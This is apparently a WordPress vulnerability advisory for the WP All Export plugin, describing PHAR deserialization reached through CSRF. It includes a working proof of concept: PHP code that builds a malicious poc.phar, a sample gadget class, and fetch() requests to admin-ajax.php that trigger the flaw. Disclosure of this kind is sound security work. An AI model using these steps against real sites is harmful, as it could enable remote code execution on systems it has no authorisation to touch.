WordPress Plugin Vulnerabilities
WP All Export (Free < 1.4.1, Pro < 1.8.6) - Author+ PHAR Deserialization via CSRF
Description
The plugin does not check nonce tokens early enough in the request lifecycle, allowing attackers with the ability to upload files to make logged in users perform unwanted actions leading to PHAR deserialization, which may lead to remote code execution.
Proof of Concept
1. Ensure your WordPress installation is using PHP version 7.4 or earlier. 2. Create a `poc.phar` file using the following code, and add it to the root directory of the server: <?php class Evil {} try { $pharFile = 'poc.phar'; if (file_exists($pharFile)) { unlink($pharFile); } $phar = new Phar($pharFile); $phar->startBuffering(); $phar->addFromString( 'test.txt', 'text' ); $phar->setStub( '<?php __HALT_COMPILER(); ?>' ); $phar->setMetadata( new Evil() ); $phar->stopBuffering(); echo "$pharFile successfully created" . PHP_EOL; } catch (Exception $e) { echo $e->getMessage(); } 3. Add the following code to the server to simulate a gadget: class Evil { function __wakeup() { die('Arbitrary deserialization'); } } 4. Run the following code in your browser to create a new export as a Super Admin user and note its ID. Notice that no nonce is required. Replace the `/var/www/html` directory if needed. await fetch("/wp-admin/admin-ajax.php?action=options&page=pmxe-admin-export", { "credentials": "include", "headers": { "Content-Type": "application/x-www-form-urlencoded", }, "method": "POST", "body": "update_previous=0&filepath=phar:///var/www/html/poc.phar/test.txt&export_to=XmlGoogleMerchants", "mode": "cors", }); 5. Run the following code in your browser, as a Super Admin (again no nonce needed), using the ID of the export created in the previous step, and see that the PHAR deserialization occurs by examining its output. await fetch("https://wpscan-vulnerability-test-bench.ddev.site/wp-admin/admin-ajax.php?action=download&page=pmxe-admin-export&google_feed=1&id=ID", { "credentials": "include", "headers": {}, "method": "GET", "mode": "cors", });
Affects Plugins
References
CVE
Classification
Type
CSRF
OWASP top 10
CWE
CVSS
Miscellaneous
Submitter
Alex Sanford
Submitter website
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2023-11-21 (about 5 months ago)
Added
2023-11-21 (about 5 months ago)
Last Updated
2023-11-21 (about 5 months ago)